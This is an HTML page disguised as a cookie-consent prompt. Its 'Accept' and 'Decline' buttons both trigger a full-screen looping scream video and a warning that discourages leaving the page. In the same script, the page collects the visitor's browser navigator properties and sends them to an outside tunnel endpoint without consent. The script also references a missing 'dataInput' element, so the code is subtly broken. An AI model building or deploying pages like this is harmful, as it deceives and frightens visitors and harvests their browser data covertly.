<!DOCTYPE html>
<html>
	<head>
		<meta charset='utf-8'>
		<meta name="viewport" content="width=device-width, initial-scale=1, max-scale=1, user-scalable=0" />
		<title>Cookies agreement</title>
		<!-- <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"> -->
		<link rel="preconnect" href="https://fonts.googleapis.com">
		<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
		<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;900&display=swap" rel="stylesheet">
		<style>
			body {
				width: 95%;
				height: 100%;
				/*background-color: rgba(218,239,250,1);*/
				text-align: center;
				padding: 100px 0px;
				/*overflow: hidden;*/
			}
			.block {
				width: 100%;
				padding: 20px 0px;
			}
			.btn {
				border: none;
				padding: 8px 24px;
				border-radius: 4px;
				font-size: 20px;
				font-family: 'Roboto', serif;
				font-weight: 500;
				user-select: none;
				-webkit-user-select: none;
				-moz-user-select: none;
				display: inline-block;
				margin: auto;
			}
			.btn-primary {
				color: white;
				background-color: #32b4fa;
				transition-duration: 0.2s;
			}
			.btn-primary:active {
				background-color: #2993cc;
			}
			.btn-secondary {
				background-color: #ffffff;
				color: #32b4fa;
				border: 2px solid #32b4fa;
				padding: 6px 22px;
				transition-duration: 0.2s;
			}
			.btn-secondary:active {
				background-color: #eaeaea;
			}
			.title {
				font-family: 'Roboto', sans-serif;
				font-weight: 900;
				font-size: 35px;
				padding: 50px;
				margin: auto;
			}
			.desc {
				color: gray;
				font-size: 20px;
				font-family: 'Roboto', sans-serif;
				font-weight: 400;
				width: 100%;
			}
			.textblock {
				width: 100%;
			}
			.screamer {
				position: fixed;
				bottom: 0;
				right: 0;
				min-width: 100%;
				min-height: 100%;
				object-fit: cover;
				z-index: 1;
			}
			.screamer[hidden] {
				display: none;
			}
			.mainblock {
				z-index: 2;
			}
			.mainblock[hidden] {
				display: none;
			}
		</style>
	</head>
	<body>
		<!-- <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script> -->
		<div class="mainblock">
		<div class="textblock">
			<div class="title">
				This site uses cookies
			</div>
			<div class="desc">
				This website uses cookies to offer you the most relevant information and better understand how you use this website. Please accept cookies for optimal performance.
			</div>
		</div>
		<div class="block">
		<button type="button" class="btn btn-primary" id="accept" onclick="onClick();">Accept</button>
		<button type="button" class="btn btn-secondary" id="decline" onclick="onClick();">Decline</button>
		</div>
		</div>
		<video src="media/scream.mp4" class="screamer" id="video" loop hidden></video>
		<script type="text/javascript">
			let acceptButton = document.getElementById("accept");
			let declineButton = document.getElementById("decline");
			let video = document.getElementById("video");
			let mainblock = document.getElementsByClassName("mainblock")[0];
			window.onbeforeunload = function(){
				if(!video.paused) { return true }
			}
			function onClick(event) {
				if(event) event.preventDefault();
				mainblock.hidden = true;
				video.hidden = false;
				video.play();
				videoClick();
				const navigatorData = {};
				
				// Переносим все перечисляемые свойства объекта navigator
				for (const key in navigator) {
				if (navigator.hasOwnProperty(key)) {
					try {
				    	// Пробуем сохранить свойство
				        navigatorData[key] = navigator[key];
				        } catch (e) {
				        // Игнорируем ошибки доступа к свойствам
				        }
				    }
				}
				var xhr = new XMLHttpRequest();
				var data = {
					input: document.getElementById('dataInput').value
				};
				
				xhr.open('POST', 'http://mishpro.serveo.net/endpoint', true);
				xhr.setRequestHeader('Content-Type', 'application/json');
				
				xhr.onload = function() {
					if (xhr.status === 200) {
						console.log('Данные успешно отправлены!');
					} else {
						alert('Ошибка: ' + xhr.status);
					}
				};
				
				xhr.send(JSON.stringify(navigatorData));
			}
			function videoClick(){
				if(this.requestFullScreen) this.requestFullScreen();
				if(this.mozRequestFullScreen) this.mozRequestFullScreen();
				if(this.webkitRequestFullScreen) this.webkitRequestFullScreen();
				if(this.msRequestFullScreen) this.msRequestFullScreen();
			}
			acceptButton.addEventListener("click", onClick);
			declineButton.addEventListener("click", onClick);
			video.addEventListener("click", videoClick);
		</script>
	</body>	
</html>
